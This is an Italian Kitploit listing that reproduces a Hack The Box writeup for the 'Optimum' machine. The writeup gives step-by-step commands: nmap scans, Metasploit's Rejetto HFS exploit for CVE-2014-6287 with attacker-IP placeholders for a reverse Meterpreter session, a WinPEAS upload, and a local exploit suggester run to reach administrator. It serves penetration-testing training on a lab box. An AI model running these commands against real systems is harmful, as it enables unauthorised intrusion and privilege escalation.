Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Optimum — Writeup della macchina Optimum di Hack The Box. Questa guida copre lo sfruttamento di Rejetto HttpFileServer 2.3 (CVE-2014-6287) per ottenere l'accesso iniziale, seguito dall'elevazione dei privilegi su un host Windows utilizzando tecniche di enumerazione e strumenti di post-exploitation. | Kitploit
Strumenti/GitHubGitHub/r3fr4kt/optimum
Escalation di PrivilegiRicognizioneScanner di VulnerabilitàAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPost-ExploitPenetration TestingApprendimento e Formazione
GitHubr3fr4kt/optimum
5 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Writeup della macchina Optimum di Hack The Box. Questa guida copre lo sfruttamento di Rejetto HttpFileServer 2.3 (CVE-2014-6287) per ottenere l'accesso iniziale, seguito dall'elevazione dei privilegi su un host Windows utilizzando tecniche di enumerazione e strumenti di post-exploitation.

Optimum

Vedi Repository
Condividi

Optimum


Optimum – Writeup di Hack The Box

Panoramica

In questa macchina, l'obiettivo è ottenere un accesso iniziale a un host Windows sfruttando un servizio web vulnerabile e successivamente elevare i privilegi per ottenere la flag dell'amministratore.

Il percorso di attacco ha previsto:

  • Enumerazione dei servizi
  • Sfruttamento di Rejetto HTTP File Server 2.3
  • Accesso iniziale tramite Metasploit
  • Elevazione dei privilegi utilizzando WinPEAS e i moduli di post-exploitation di Metasploit

Ricognizione

Iniziamo con una scansione completa delle porte TCP per identificare i servizi esposti.

root@kitploit:~
nmap -Pn -n -p- --min-rate 5000 -T4 <TARGET_IP>

La scansione rivela la porta 80 aperta.

Successivamente, eseguiamo una scansione dei servizi e delle versioni.

root@kitploit:~
nmap -p80 -sSCV --min-rate 5000 -T4 <TARGET_IP>

Il risultato identifica il seguente servizio:

root@kitploit:~
HttpFileServer 2.3

Questo servizio corrisponde a Rejetto HTTP File Server, un server web leggero per la condivisione di file.


Identificazione della Vulnerabilità

Dopo aver effettuato ricerche sulla versione rilevata, scopriamo una vulnerabilità nota:

root@kitploit:~
CVE-2014-6287

Questa vulnerabilità consente l'esecuzione remota di codice a causa di una scorretta sanitizzazione degli input.


Sfruttamento

Per sfruttare la vulnerabilità, utilizziamo Metasploit.

Avviamo Metasploit:

root@kitploit:~
msfconsole -q

Cerchiamo il modulo appropriato:

root@kitploit:~
search rejetto

Carichiamo il modulo exploit:

root@kitploit:~
use exploit/windows/http/rejetto_hfs_exec

Configuriamo le opzioni richieste:

root@kitploit:~
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set LHOST <ATTACKER_IP>
set LPORT <ATTACKER_PORT>
run

Una volta eseguito, l'exploit fornisce una sessione Meterpreter sulla macchina target.


Accesso Iniziale

Con la sessione Meterpreter ottenuta, esploriamo il filesystem per recuperare la flag utente.

root@kitploit:~
cd
cat user.txt
whoami

L'output dei comandi mostra che siamo autenticati come:

root@kitploit:~
kostas

Poiché questo utente non dispone di privilegi amministrativi, procediamo con l'elevazione dei privilegi.


Enumerazione per l'Elevazione dei Privilegi

Per identificare potenziali vettori di elevazione dei privilegi, carichiamo WinPEAS, un noto strumento di enumerazione per l'elevazione dei privilegi su Windows.

root@kitploit:~
upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe

Successivamente lo eseguiamo:

root@kitploit:~
shell
.\wp.exe

L'output rivela informazioni utili, incluse credenziali associate all'utente kostas.


Elevazione dei Privilegi

Dopo aver esaminato i possibili vettori di elevazione, utilizziamo il modulo di Metasploit:

root@kitploit:~
local_exploit_suggester

Carichiamo il modulo:

root@kitploit:~
use post/multi/recon/local_exploit_suggester

Configuriamo la sessione:

root@kitploit:~
set SESSION <SESSION_NUMBER>
run

Questo modulo suggerisce possibili exploit locali che possono essere utilizzati per elevare i privilegi.

Dopo aver elevato con successo i privilegi, otteniamo una shell con diritti amministrativi.

Verifica:

root@kitploit:~
shell
whoami

Accesso come Amministratore

Una volta ottenuti i privilegi amministrativi, ci spostiamo nella directory Administrator per recuperare la flag root.

root@kitploit:~
cd \Users\Administrator
dir
cd Desktop
dir
type root.txt

Punti Chiave

Questa macchina dimostra diversi concetti importanti del penetration testing:

  • Una corretta enumerazione dei servizi è fondamentale per identificare software vulnerabili.
  • Vulnerabilità note pubblicamente come CVE-2014-6287 possono portare a un'immediata esecuzione remota di codice.
  • Strumenti come WinPEAS aiutano a identificare opportunità di elevazione dei privilegi in ambienti Windows.
  • I moduli di post-exploitation di Metasploit possono accelerare il processo di elevazione dei privilegi.
Scarica lo strumento